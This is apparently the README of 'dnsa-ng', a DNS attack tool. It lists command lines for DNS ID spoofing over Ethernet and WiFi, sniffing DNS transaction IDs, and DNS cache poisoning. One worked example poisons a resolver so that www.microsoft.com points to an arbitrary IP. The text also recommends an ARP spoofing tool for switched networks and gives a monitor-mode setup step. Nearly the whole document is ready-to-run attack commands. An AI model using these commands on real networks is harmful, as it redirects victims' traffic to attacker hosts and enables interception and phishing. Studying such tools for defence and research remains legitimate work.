DNS ID Spoofing :
-----------------
[ If you want to use it on switched networks, you'll need to use a tool to make arp spoofing. I recommand you arp-sk (http://www.arp-sk.org) which is the greater ! ;) ]
	./dnsa-ng -m [raw4 or link] -1 -D the_FQDN_you_want_to_reply_to.org -S IP_TO_SEND -s HOST_TO_FOOL -i INTERFACE -t ether

Using Ethernet
==>	./dnsa-ng -m [raw4 or link] -1 -D www.the_one.org -S 1.2.3.4 -s 192.168.0.1 -i eth0 -t ether

Using WiFi : it captures 802.11 traffic using monitor mode of the first card, and injects forged packets with another card which is aussociated with the AP.
In order to put your card in monitor mode, you can use "iwconfig [interface] mode monitor". Do not forget to use the same channel...
==>	./dnsa-ng -m [raw4 or link] -1 -D www.the_one.org -S 1.2.3.4 -s 192.168.0.1 -i ath0 -t wifi -I wlan0


DNS Sniffing (Needs to be improved) :
-----------------------------------
[ For the moment, it justs sniff DNS IDs, but doesn't do anything. We are actually working on prediction. ]
	./dnsa-ng -t ether -m [raw4 or link] -2 -s HOST_TO_SNIFF -w file_to_store_IDs

==>	./dnsa-ng -t ether -m [raw4 or link] -2 -s 192.168.0.1 -w IDs_of_192.168.0.1

DNS cache poisoning :
---------------------
	./dnsa-ng -t ether -m [raw4 or link] -3 -D the_host_IP_which_is_asked_for -S normal_host_IP -s DNS_server_which_is_doing_the_request -a host_in_additional_record -b ip_in_the_additional_record -i INTERFACE

==>	./dnsa-ng -t ether -m [raw4 or link] -3 -D hacker.pirate.org -S 100.101.102.103 -s 194.117.200.10 -a www.microsoft.com -b 1.2.3.4 -i eth0


--
If you need help, contact me : 
	Pierre BETOUIN
	pierre.betouin@security-labs.org
